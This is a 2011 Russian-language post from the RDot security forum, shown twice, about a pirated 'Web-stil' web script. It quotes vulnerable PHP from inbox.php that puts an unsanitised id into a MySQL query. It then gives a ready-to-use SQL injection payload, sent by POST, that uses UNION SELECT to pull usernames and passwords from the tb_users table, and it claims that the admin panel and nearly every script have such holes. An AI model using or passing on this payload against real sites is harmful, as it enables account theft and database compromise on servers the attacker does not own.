RDot - Показать сообщение отдельно - Web-stil ("пиратская" копия)

Online · 08.02.2011, 14:14

SQL inj
if mq = off
Vuln file: inbox.php

PHP код:


			
///
    if($action=='view')
    {
        require('config.php');
        $res=mysql_query("select * from tb_mail where id='$id'");
        $res=mysql_fetch_array($res);
        mysql_query("update tb_mail set status='1' where id='$id'");
        mysql_close($con);
        ?>

///

Exploit:

Код:

Отправляем POST'ом "action=view&id=-1' union select 1,2,3,concat_ws(0x3a,username,password),5,6,7 from tb_users limit 0,1+--+"

В админке и почти во всех скриптах инъекции присутствуют =)

08.02.2011, 14:14	#3
Online Регистрация: 31.01.2011 Сообщений: 10 Репутация: 10	SQL inj if mq = off Vuln file: inbox.php PHP код: `/// if($action=='view') { require('config.php'); $res=mysql_query("select * from tb_mail where id='$id'"); $res=mysql_fetch_array($res); mysql_query("update tb_mail set status='1' where id='$id'"); mysql_close($con); ?> ///` Exploit: Код: Отправляем POST'ом "action=view&id=-1' union select 1,2,3,concat_ws(0x3a,username,password),5,6,7 from tb_users limit 0,1+--+" В админке и почти во всех скриптах инъекции присутствуют =) __________________ Чем больше ты имеешь, тем с большей жадностью стремишься к тому, чего у тебя нет. Война у тебя рождается из побед.